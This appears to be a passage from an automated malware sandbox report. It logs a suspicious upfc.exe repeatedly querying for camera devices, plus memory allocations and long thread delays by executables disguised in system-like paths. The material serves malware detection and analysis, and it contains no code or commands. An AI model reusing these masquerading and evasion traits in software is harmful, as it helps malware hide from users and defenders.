                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeMemory allocated: EB0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeMemory allocated: 1A870000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeMemory allocated: 1380000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeMemory allocated: 1AF40000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeMemory allocated: 1510000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeMemory allocated: 1B370000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeMemory allocated: 2F60000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeMemory allocated: 1B0F0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeMemory allocated: 2670000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeMemory allocated: 1A800000 memory reserve | memory write watch
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeMemory allocated: 18E0000 memory reserve | memory write watch
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeMemory allocated: 1B310000 memory reserve | memory write watch
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeMemory allocated: B10000 memory reserve | memory write watch
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeMemory allocated: 1A960000 memory reserve | memory write watch
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeMemory allocated: 1830000 memory reserve | memory write watch
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeMemory allocated: 1B4A0000 memory reserve | memory write watch
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeMemory allocated: 9F0000 memory reserve | memory write watch
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeMemory allocated: 1A580000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 599871Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 599025Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 598891Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 598688Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 3600000Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 598562Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 598438Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 598313Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 598199Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 598088Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 597782Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 597516Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 597227Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 597101Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596983Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596780Jump to behavior
